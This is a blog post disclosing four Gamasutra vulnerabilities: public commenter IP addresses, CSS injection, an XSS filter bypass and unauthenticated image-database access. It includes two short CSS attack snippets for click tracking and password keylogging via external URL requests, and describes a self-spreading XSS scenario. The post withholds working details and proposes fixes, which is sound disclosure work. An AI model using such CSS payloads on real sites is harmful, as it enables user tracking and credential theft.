<!DOCTYPE HTML>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1" >

    <title>Disclosing Multiple Gamasutra Vulnerabilities</title>
    <meta name="description" content="After a multi-year responsible disclosure period, I am publicly disclosing 4 different Gamasutra vulnerabilities." >

    <link href="/styles/blogpost.css?nocache" rel="stylesheet">
    <link href="/styles/zenburn.css" rel="stylesheet">
</head>
<body>
    <script type="text/javascript">
     /*
      * Avoid flash of unstyled text (iff user has JS enabled)
      * - use classList consistently so older browsers will still work.
      */
     document.body.classList.add('no-fot');

     // TODO: I don't want to have to wait for everything...
     // TODO: text width is still messing with things.
     window.onload = function () {
         document.body.classList.remove('no-fot');
     };

     //3 second Bailout
     setTimeout(function () {
         document.body.classList.remove('no-fot');
     }, 3000);
    </script>

        <script type="text/javascript">

         /*
          * Adapting code samples from:
          * - https://stackoverflow.com/questions/27078285/simple-throttle-in-js
          * - https://www.sitepoint.com/css-position-sticky-introduction-polyfills/
          */
         window.addEventListener('load', function () {

             function throttle(func, wait, options) {
                 var context, args, result;
                 var timeout = null;
                 var previous = 0;
                 if (!options) options = {};
                 var later = function() {
                     previous = options.leading === false ? 0 : Date.now();
                     timeout = null;
                     result = func.apply(context, args);
                     if (!timeout) context = args = null;
                 };
                 return function() {
                     var now = Date.now();
                     if (!previous && options.leading === false) previous = now;
                     var remaining = wait - (now - previous);
                     context = this;
                     args = arguments;
                     if (remaining <= 0 || remaining > wait) {
                         if (timeout) {
                             clearTimeout(timeout);
                             timeout = null;
                         }
                         previous = now;
                         result = func.apply(context, args);
                         if (!timeout) context = args = null;
                     } else if (!timeout && options.trailing !== false) {
                         timeout = setTimeout(later, remaining);
                     }
                     return result;
                 };
             }

             (function () {
                 var header = document.querySelector('header');
                 var top = header.getBoundingClientRect().height;
                 var outline = document.querySelector('article nav');
                 outline.classList.add('js-unstick');

                 var added = false;
                 function scroll () {
                     if (window.pageYOffset >= top && !added) {
                         outline.classList.add('js-stick');
                         outline.classList.remove('js-unstick');
                         added = true;
                     } else if (window.pageYOffset < top && added) {
                         outline.classList.add('js-unstick');
                         outline.classList.remove('js-stick');
                         added = false;
                     }
                 }

                 window.addEventListener('scroll', throttle(scroll, 60));
                 scroll();
             }());


             (function () {
                 //Bold the outline position that you're currently at.

                 function setBreakpoints () {
                     breakpoints = [];
                     outline.forEach(function (elem) {
                         var id = elem.querySelector('a').href.split('#')[1]; //TODO: is this the best way to handle this?
                         var section = document.querySelector(`section.${ id }`);
                         var top = window.pageYOffset + section.querySelector('h1').getBoundingClientRect().top;
                         var bottom = window.pageYOffset + section.querySelector('p:last-of-type').getBoundingClientRect().bottom;

                         breakpoints.push({
                             elem : elem,
                             top : top,
                             bottom : bottom,
                             height : bottom - top
                         });

                     });
                 }

                 var breakpoints = [];
                 var outline = Array.from(
                     document.querySelectorAll('article > nav ul li'));

                 var currentSection = outline[0];
                 function setPosition () {
                     var index;
                     for(index = 0; index <= breakpoints.length; index++) {
                         let point = breakpoints[index];
                         let value = Math.max(point.top + window.innerHeight, point.bottom);

                         if (index === breakpoints.length ||
                             window.innerHeight + window.pageYOffset < value) {

                             break;
                         }
                     }

                     currentSection.classList.remove('active');
                     currentSection = outline[index];
                     currentSection.classList.add('active');
                 }

                 window.addEventListener('scroll', throttle(setPosition, 100));
                 document.body.onresize = throttle(function () {
                     setBreakpoints();
                     setPosition();
                 }, 200); //Apparently addEventListener doesn't work? Look into this.

                 setBreakpoints();
                 setPosition();

                 //Covering for a post-render bug
                 //This is pretty much the *worst* way to handle this
                 //But I'm not dealing with this right now, it's stupid.
                 //Basically the better solution is to pre-render the correct width/height of images & twitter embeds.
                 //Basically all embeds *ought* to be handled this way.
                 //The lack of proper handling measn that even linking to later sections can break.
                 //However, it's not clear how I can guess what the height of every element should be.
                 //Especially if I want to bake that into the html or something.
                 //Basically, I'm not sure how to handle it, and I'm too tired to figure it out tonight.
                 setTimeout(function () {
                     setBreakpoints();
                     setPosition();
                 }, 1000);
             }());
         });

        </script>

    <header>
        <nav>
            <ul>
                <li class="site-logo" ><a href="/">
                    <img src="/images/logo-text.svg" alt="site logo" />
                    <span class="name">Daniel Shumway</span>
                </a></li>

                <li class="resume"><a href="/resume/base">
                    Resume
                </a>
            </ul>
        </nav>
    </header>

    <main>
            <article>

                    <nav>
                        <ul class="sectlevel1">
<li><a href="#some-brief-background">Some brief background</a></li>
<li><a href="#public-ip-addresses-linked-to-comments">Public IP addresses linked to comments</a></li>
<li><a href="#css-injection-vulnerability-within-posts">CSS injection vulnerability within posts</a></li>
<li><a href="#xss-vulnerability-within-posts">XSS vulnerability within posts</a></li>
<li><a href="#lack-of-database-authentication">Lack of database authentication</a></li>
<li><a href="#user-mitigation">User mitigation</a></li>
<li><a href="#where-from-here">Where from here?</a></li>
</ul>
                    </nav>

                <h1>Disclosing Multiple Gamasutra Vulnerabilities</h1>
                <div class="summary">After a multi-year responsible disclosure period, I am publicly disclosing 4 different Gamasutra vulnerabilities.</div>

                <section id="preamble">
    <p class="header id=header">
    <strong>Update:</strong> I<span class="quote single-close">'</span>ve talked with UBM<span class="quote single-close">'</span>s security team, they are currently working on fixes and say that they<span class="quote single-close">'</span>ll have more updates within around 7 days. I<span class="quote single-close">'</span>ll update this post with any new information as I get it.
</p>

</section>

<section class="some-brief-background">
    <h1 id="some-brief-background"><a class="anchor" href="#some-brief-background">Some brief background</a></h1>
    <div class="imageblock">
<div class="content">
<img src="./images/gamasutra_logo.png" alt="Gamasutra Logo">
</div>
</div>
<p>
    I reported the majority of the vulnerabilities below to Gamasutra in early 2016,
following up multiple times with multiple members of Gamasutra<span class="quote single-close">'</span>s security team.
Eventually, updates were made to the site which I was told would correct the
problem.
</p>

    <aside>
        <p>
    Responsible disclosure periods often range between security researchers, but in
general the advice I<span class="quote single-close">'</span>ve gotten has been to wait 2 weeks to 120 days. Because I
am not a security researcher, I kept them private between me and the company for
over 2 years.
</p>

<p>
    It was a mistake for me to wait this long. Part of responsible disclosure is
publicly releasing information, even after vulnerabilities have been fixed.
I held out hope for too long that the remaining problems would be
fixed if just waited longer.
</p>

    </aside>

<p>
    Two months ago I accidentally discovered another severe vulnerability while
authoring a blog post. I sent another email and was assured that engineers would
look into it.
</p>

<p>
    Recently I checked back in and I discovered that none of security holes I
disclosed were ever actually plugged. Even in the single case where Gamasutra
made an effort to correct the problem, the solution was halfhearted and
wildly insufficient. I am publicly disclosing all of the vulnerabilities in the
hope that this encourages Gamasutra to fix them properly.
</p>

<p>
    Wherever researching or probing a vulnerability would force me to touch data
that did not belong to me or to exploit another user in any way, I declined to
do so. Some of the vulnerabilities listed below have had some details omitted in
order to make them at least a bit harder for malicious actors reverse engineer
and exploit.
</p>

</section>

<section class="public-ip-addresses-linked-to-comments">
    <h1 id="public-ip-addresses-linked-to-comments"><a class="anchor" href="#public-ip-addresses-linked-to-comments">Public IP addresses linked to comments</a></h1>
    <p>
    Gamasutra records the IP address of every user who posts a comment on the site.
This address is attached to the response JSON of every comment for every
article. A malicious visitor can easily view the IP address of any commenter on
the Gamasutra website. They don<span class="quote single-close">'</span>t even need to make an account.
</p>

<p>
    These IP addresses are stored indefinitely. I have been a Gamasutra user for
many years. When I discovered this vulnerability, I was able to reconstruct my
entire living history for the entire duration of my account history. I could
even tell the difference between comments submitted at my own home and comments
made from public locations.
</p>

<p>
    IP addresses are relatively easy to tie to physical locations. While they
(usually) do not have enough granularity to zero in on a specific house or
person, they can often be granular enough to get you to the proper town.
</p>

<p>
    In layman<span class="quote single-close">'</span>s terms, most people who comment on a Gamasutra article are publicly
and permanently listing their zip code on the Internet for literally anyone
to see.
</p>

</section>

<section class="css-injection-vulnerability-within-posts">
    <h1 id="css-injection-vulnerability-within-posts"><a class="anchor" href="#css-injection-vulnerability-within-posts">CSS injection vulnerability within posts</a></h1>
    <p>
    Gamasutra allows posts to edit raw HTML. This is somewhat unusual for a blogging
platform, but not unprecedented. However, Gamasutra also supports style tags
within a post<span class="quote single-close">'</span>s HTML. Because Gamasutra blog posts are not embedded in iframes
or otherwise isolated from the host page, users are able to use CSS to override
first-party page styles.
</p>

<p>
    The largest risk here is defacement and phishing. A user could hide elements of
the Gamasutra website (including ads, banner elements, and other links) or they
could replace them with custom content. Because HTML is allowed within posts,
otherwise invisible link tags can be positioned over these elements.
</p>

    <aside>
        <p>
    Ever wanted to advertise your game on Gamasutra? Turns out you can, at least on
articles that you write.
</p>

    </aside>

<p>
    Outside of the obvious exploits, there are a few more obscure attacks that can
be leveraged with pure CSS access, even without taking any advantage of custom
HTML elements. This is because CSS properties have the ability to link to
external resources.
</p>

<p>
    This can be be exploited to enable
<a href="https://github.com/jbtronics/CrookedStyleSheets" target="_blank" rel="noopener">behavioral tracking</a>.
</p>

<div class="listingblock">
<div class="content"><pre class="highlight">
<code class="language-css" data-lang="css"><span class="hljs-selector-id">#link2</span><span class="hljs-selector-pseudo">:active</span><span class="hljs-selector-pseudo">::after</span> {
    <span class="hljs-attribute">content</span>: <span class="hljs-built_in">url</span>(<span class="hljs-string">"track.php?action=link2_clicked"</span>);
}</code>
</pre></div>
</div>
<p>
    It can also be used to record
<a href="https://github.com/maxchehab/CSS-Keylogging" target="_blank" rel="noopener">user passwords</a>.
</p>

<div class="listingblock">
<div class="content"><pre class="highlight">
<code class="language-css" data-lang="css"><span class="hljs-selector-tag">input</span><span class="hljs-selector-attr">[type="password"]</span><span class="hljs-selector-attr">[value$="a"]</span> {
    <span class="hljs-attribute">background-image</span>: <span class="hljs-built_in">url</span>(<span class="hljs-string">"http://localhost:3000/a"</span>);
}</code>
</pre></div>
</div>
<p>
    To be vulnerable to this attack a user would need to visit the post while logged
out and log in on that same page. So while this is an attack vector worth
protecting against, it<span class="quote single-close">'</span>s far less dangerous than a standard phishing attack.
</p>

</section>

<section class="xss-vulnerability-within-posts">
    <h1 id="xss-vulnerability-within-posts"><a class="anchor" href="#xss-vulnerability-within-posts">XSS vulnerability within posts</a></h1>
    <p>
    It is, however, much easier to steal credentials with Javascript than with CSS.
</p>

<p>
    When I first contacted Gamasutra about these vulnerabilities, <code>&lt;script&gt;</code> tags
were not being blocked at all. Since then, Gamasutra has made some effort to
strip scripts and other Javascript from user posts.
</p>

<p>
    However, it is trivial to bypass this restriction. While I won<span class="quote single-close">'</span>t mention the
exact method, Gamasutra<span class="quote single-close">'</span>s parsing seems to based on a few half-hearted regular
expressions. It only took a few hours to find holes in their system, and the
majority of that time was spent waiting for my posts to properly save and load.
</p>

<div class="imageblock">
<div class="content">
<img src="./images/xss-example.png" alt="A picture of an XSS attack I was able to execute on my own post.">
</div>
</div>
<p>
    Similar to the CSS vulnerabilities I listed above, this opens the door to 3rd party
tracking and monitoring. But tracking is only the start.
</p>

<p>
    Since Gamasutra<span class="quote single-close">'</span>s blog posts are not isolated from the main page, inserted
scripts are free to make network requests on behalf of a signed-in user. An
attacker can read private information from a user<span class="quote single-close">'</span>s profile, post comments on
their behalf, save their login credentials, or even silently change their
password directly from the user<span class="quote single-close">'</span>s own browser.
</p>

<p>
    Gamasutra does not restrict requests to other domains, so scripts can be loaded
remotely and can communicate with any other server online.
</p>

<p>
    Stealing a user<span class="quote single-close">'</span>s credentials means that an attacker gets edit access to that
user<span class="quote single-close">'</span>s blog posts. This means that a script can <span class="double-push"></span><span class="quote double-open">"</span>infect<span class="quote double-close">"</span> other user accounts,
inserting itself into their posts to silently spread itself across the site.
Because it<span class="quote single-close">'</span>s unlikely for users and administrators to regularly check old
articles for edits, a careful attacker could silently infect old content for
some time&#8201;&#8212;&#8201;redirecting ads, defacing and editing old content, trolling for
personal information, stealing user CPU cycles or network access, and just
generally tracking users as they browse.
</p>

</section>

<section class="lack-of-database-authentication">
    <h1 id="lack-of-database-authentication"><a class="anchor" href="#lack-of-database-authentication">Lack of database authentication</a></h1>
    <p>
    The most troubling vulnerability I found was that Gamasutra gives logged-out
users full access to its site-wide image database.
</p>

<p>
    Details on this specific vulnerability are being kept deliberately sparse,
because there<span class="quote single-close">'</span>s no way I can provide them without violating user privacy or
making it completely obvious how to replicate the attack.
</p>

<p>
    I<span class="quote single-close">'</span>m not sure if querying what is essentially a public database even counts as
hacking, but once I realized the extent of my access, I tried to avoid looking
at any data that did not explicitly belong to me. As a result, I don<span class="quote single-close">'</span>t know the
full extent of how much damage a malicious user could do. Determining what parts
of Gamasutra could be attacked would have required me to touch other people<span class="quote single-close">'</span>s
data without their permission.
</p>

<p>
    However, I suspect that this database contains at least:
</p>

<ul >
        <li>
            images for any native advertising that Gamasutra runs.
        </li>
        <li>
            every image that anyone has ever uploaded to a blog post.
        </li>
        <li>
            images included in job postings.
        </li>
        <li>
            images included in drafts and future job postings.
        </li>
</ul>

<p>
    I confirmed that I was able to view, upload, delete, and rename images from one
of my own blog posts. I also confirmed that once Gamasutra<span class="quote single-close">'</span>s cache expired, the
new replacement images were served as normal.
</p>

</section>

<section class="user-mitigation">
    <h1 id="user-mitigation"><a class="anchor" href="#user-mitigation">User mitigation</a></h1>
    <p>
    Don<span class="quote single-close">'</span>t use Gamasutra. Don<span class="quote single-close">'</span>t make an account. Don<span class="quote single-close">'</span>t comment on articles. Don<span class="quote single-close">'</span>t
post articles. Don<span class="quote single-close">'</span>t post jobs. Don<span class="quote single-close">'</span>t apply to jobs. This should be the default
response for most people.
</p>

<p>
    However, in the case that you can<span class="quote single-close">'</span>t stop using the site, at least limit your
logged-in time. Only log in when you are posting content. <em>Never</em> read another
person<span class="quote single-close">'</span>s blog post or article while logged in.
</p>

<p>
    I<span class="quote single-close">'</span>ve used flashy examples to showcase these attacks, but real-world black-hat
attackers are subtle. You won<span class="quote single-close">'</span>t notice them.
</p>

<p>
    Don<span class="quote single-close">'</span>t store personal or confidential information on your Gamasutra account, even
if it looks like that information is private. Don<span class="quote single-close">'</span>t leave blog posts or job
postings in draft states, publish them as soon as you<span class="quote single-close">'</span>re done writing. If you
signed up for Gamasutra a long time ago, you may not remember that the signup
process required you to list both a business phone number and a physical
business address. This is very likely your home address and personal number.
</p>

<div class="imageblock">
<div class="content">
<img src="./images/personal-information.png" alt="Your personal information is listed under the account button when you log in">
</div>
</div>
<p>
    The XSS attack I list above can easily access and record all of this
information. Since you<span class="quote single-close">'</span>re not allowed to leave these fields blank, you should
lie and fill in a <a href="https://www.fakeaddressgenerator.com/" target="_blank" rel="noopener">fake
address/number</a>. This is a good habit to get into in general when signing up
for new services online. Don<span class="quote single-close">'</span>t freely give businesses the information that would
be necessary to dox you.
</p>

<p>
    If you are an EU citizen, you may also be able to file a request under GDPR to
learn what information UBM (Gamasutra<span class="quote single-close">'</span>s parent company) has collected about you
and to ask them to delete it. If you do file a request, contact me and let me
know what response you get back&#8201;&#8212;&#8201;I<span class="quote single-close">'</span>m curious.
</p>

    <aside>
        <p>
    Bear in mind that GDPR will only protect you from compliant companies who
operate in the EU. If a malicious party gets a hold of your information, GDPR
isn<span class="quote single-close">'</span>t going to make that information go away&#8201;&#8212;&#8201;so you should still get in the
habit of giving companies fake information where possible.
</p>

    </aside>

<p>
    Finally, you should consider buying a VPN. I won<span class="quote single-close">'</span>t give a specific
recommendation, but you can find comparisons and breakdowns online. VPNs get a
lot of flack in the privacy community as a flawed solution to ISP tracking, and
much of that criticism is warranted. However, using a VPN protects you against a
much broader range of attackers than just your ISP.
</p>

<p>
    Connecting to a website directly from your ISP allows that website to log your
approximate location and more easily fingerprint you. In the case of Gamasutra,
that IP address is publicly available. Commenting without a VPN doesn<span class="quote single-close">'</span>t just
mean your ISP and a couple of ad networks can track you. It means everyone can
track you.
</p>

</section>

<section class="where-from-here">
    <h1 id="where-from-here"><a class="anchor" href="#where-from-here">Where from here?</a></h1>
    <p>
    My immediate hope is that Gamasutra fixes the issues above. Many of them could
be (mostly) mitigated with just a few changes.
</p>

<ul >
        <li>
            Don&#8217;t attach IP addresses to comments (also don&#8217;t store IP addresses in perpetuity).
        </li>
        <li>
            Embed blog posts inside of a
<a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox" target="_blank" rel="noopener">sandboxed</a>
iframe. This won&#8217;t block all 3rd-party tracking, and does comes with its own
caveats, but it would go a long way towards mitigating many of the worst
attacks I mention above.
        </li>
        <li>
            Block database access if a user doesn&#8217;t have authentication.
        </li>
        <li>
            Consider setting a sitewide CSP
<a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src" target="_blank" rel="noopener">script
policy</a> that blocks inline/3rd-party scripts entirely except for via whitelisted domains.
        </li>
</ul>

<p>
    Unfortunately, because I am not a security researcher, and because I have
explicitly avoided digging too deeply into any of the vulnerabilities listed
here, you should assume that I didn<span class="quote single-close">'</span>t catch everything. So while it would be
nice to see Gamasutra fix these specific issues, that wouldn<span class="quote single-close">'</span>t be enough for me
to start trusting the site again.
</p>

<p>
    Rather, Gamasutra<span class="quote single-close">'</span>s parent company (<a href="https://tech.ubm.com/" target="_blank" rel="noopener">UBM</a>) should
invest adequate resources into Gamasutra<span class="quote single-close">'</span>s security, run a few third-party
audits and make sure that qualified security researchers are regularly looking
at the site. UBM is not a small company; it has the resources it needs to
maintain a professional, secure blogging platform.
</p>

<p>
    Vulnerabilities this basic and this severe suggest to me that the site
architecture <em>as a whole</em> should be considered compromised. There are
undoubtedly other exploits waiting to be discovered.
</p>

</section>

            </article>
    </main>


</body>
</html>
